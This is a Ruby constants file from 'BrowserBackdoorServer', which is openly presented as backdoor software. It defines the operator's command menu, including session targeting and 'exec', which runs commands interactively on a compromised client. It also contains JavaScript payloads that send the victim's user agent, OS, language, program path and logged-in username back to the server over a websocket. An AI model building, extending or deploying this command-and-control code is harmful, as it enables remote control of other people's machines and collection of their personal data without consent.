server/lib/bbs/constants.rb
#
# Copyright (c) 2016 IMcPwn - http://imcpwn.com
# BrowserBackdoorServer by IMcPwn.
# See the file 'LICENSE' for copying permission
#
module Bbs
module Constants
@welcomeMessage = ""\
" ____ ____ _ _ \n"\
"| __ ) _ __ _____ _____ ___ _ __| __ ) __ _ ___| | ____| | ___ ___ _ __\n"\
"| _ \\| '__/ _ \\ \\ /\\ / / __|/ _ | '__| _ \\ / _` |/ __| |/ / _` |/ _ \\ / _ \\| '__|\n"\
"| |_) | | | (_) \\ V V /\\__ | __| | | |_) | (_| | (__| | (_| | (_) | (_) | |\n"\
"|____/|_| \\___/ \\_/\\_/ |___/\\___|_| |____/ \\__,_|\\___|_|\\_\\__,_|\\___/ \\___/|_|\n"\
"Visit https://imcpwn.com/browser-backdoor for more information.\n"
@commands = {
"help" => "Show help menu",
"exit" => "Quit the application.",
"sessions" => "List active sessions.",
"target" => "Select or show targeted session.",
"info" => "Get session information (User Agent, Operating System, Language, Path, Logged in user).",
"exec" => "Execute commands on the targeted session interactively. Provide an argument to execute a file's contents (e.g. a module).",
"get_cert" => "Get a free TLS certificate from LetsEncrypt.",
"pry" => "Drop into a local Pry session.",
"clear" => "Clear the console screen.",
"ls" => "List local directory contents.",
"cat" => "Read the contents of a local file.",
"modules" => "List all modules in modules directory. To execute a module enter exec MODULE_NAME.",
"rm" => "Delete a local file."
}.sort
@infoCommands = {
"USER_AGENT" => "ws.send(\"User agent: \" + navigator.appVersion);",
"OPERATING_SYSTEM" => "ws.send(\"OS: \" + navigator.platform);",
"LANGUAGE" => "ws.send(\"Language: \" + navigator.language);",
"PATH" => "ws.send(\"Program path: \" + window.location);",
"USER" => "ws.send(\"Logged in user: \" + process.env.USERDOMAIN + \"/\" + (process.env.USERNAME || process.env.USER));"
}.sort
def Constants.getWelcomeMessage()
return @welcomeMessage
end
def Constants.getCommands()
return @commands
end
def Constants.getInfoCommands()
return @infoCommands
end
end
end